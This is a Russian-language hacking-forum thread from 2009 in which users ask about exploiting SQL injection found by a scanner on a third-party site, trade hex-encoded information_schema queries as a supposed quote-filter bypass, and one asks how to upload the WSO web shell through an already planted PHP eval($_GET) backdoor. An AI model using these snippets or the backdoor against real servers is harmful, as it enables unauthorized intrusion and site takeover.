Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.12.2009, 07:44
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сообщение от LokbatanLi
извините за вопрос ест какой то софт или ехплоит для знать сколько columns
Есть - http://forum.antichat.ru/showthread.php?t=24918
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
09.12.2009, 08:24
|
|
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847
Репутация:
5
|
|
Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
И что с ней можно сделать?И что он выдал, вроде обычная страница!
|
|
|
|
09.12.2009, 08:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сообщение от Totgeliebt
Люди помогите!Просканировала сайт на SQL иньекцию, выдал некоторые страница, которые ее типо имеют! например http://site.ru//viewpage.php?page_id=35
И что с ней можно сделать?И что он выдал, вроде обычная страница!
Есть действенный способ! Прочесть статью и удалить с компьютера сканер!
Статья - http://forum.antichat.ru/threadnav43966-1-40.html
Сканер - rmb -> delete
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
09.12.2009, 08:56
|
|
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847
Репутация:
5
|
|
Сообщение от Twoster
Есть действенный способ! Прочесть статью и удалить с компьютера сканер!
Статья - http://forum.antichat.ru/threadnav43966-1-40.html
Сканер - rmb -> delete
Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
|
|
|
|
09.12.2009, 09:08
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817
Репутация:
1503
|
|
Сообщение от Totgeliebt
Спс, но я уже читала ее!и проверяла сайт, но иньекци. не нашла.
Значит пункт 2 - удалить сканер
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
09.12.2009, 12:19
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
2Strilo4ka
так фильтрацию обходить
|
|
|
|
09.12.2009, 12:19
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696
Репутация:
40
|
|
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
|
|
|
|
09.12.2009, 12:53
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Зачем, если можно
Код:
SELECT table_name FROM information_schema.tables WHERE table_schema=0x666f72756d
? |
|
|
|
09.12.2009, 12:55
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Rubaka
2Strilo4ka
так фильтрацию обходить
Какую? Фильтрацию чего так можно обойти?
Сообщение от _gr34t
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
Господа, если не знаете что ответить или не уверены, не нужно этого делать, я уже по 100 раз всех просил об этом.
========================
Strilo4ka
Это делается для получения результата в "правильной" кодировке, и никакую фильтрацию это обойти не позволит. Ты наконец прочитаешь хоть какую-нибудь статью, или так и будет это продолжаться?
|
|
|
|
09.12.2009, 17:28
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
OC win , стоит VertrigoServ
Почему то я замешкался вот тут:
confgs.php?e=ls; не выводит список файлов
confgs.php?e=pwd; тож нехочет показывать, но показывает phpinfo()
confgs.php?e=phpinfo();
Последний раз редактировалось SeNaP; 09.12.2009 в 17:35..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
